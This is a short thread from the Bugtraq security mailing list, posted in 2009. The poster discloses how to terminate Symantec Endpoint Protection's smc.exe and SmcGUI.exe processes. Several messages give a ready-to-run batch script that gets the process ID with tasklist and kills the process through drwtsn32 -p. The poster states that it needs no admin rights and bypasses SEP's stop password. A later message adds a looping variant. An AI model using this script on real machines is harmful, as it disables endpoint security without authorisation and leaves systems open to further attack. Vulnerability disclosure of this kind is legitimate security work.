For the "users" its working for SmcGUI.exe
Please find the code as below.
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here
I have tried it and when let this file run for around 2 mins, The SmcGui.exe
process loads up when you logoff and log back in (or restart)but the icon
does not show up in the taskbar.
Thank you.
Regards, Sandeep
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 7:03 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: SEPKILL /im SMC.EXE /f
As an update its not happening for "Users" account, Though no access
Anyone knows why?
Thank you.
Regards, Sandeep
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 6:18 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: SEPKILL /im SMC.EXE /f
Probably this bug exists on majorly all the software's but security
software's like antivirus and firewall have to bucket it which is not
what its for SEP.
I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and
You can kill smc.exe with the help of drwtsn32.exe in the following way.
drwtsn32 -p %pid%
where pid is the process id for smc.exe
Save the following as a batch file and execute it
tasklist | find /i "Smc.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
You don't need admin privilege for this exploit.
This will even bypass the password if it has been set to stop the
If executed from the command line in the form drwtsn32 -p %pid% , the
command will be executed and it takes some time for the process to be
If done from a batch file the command is completed only when the process
is stopped.
Regards, Sandeep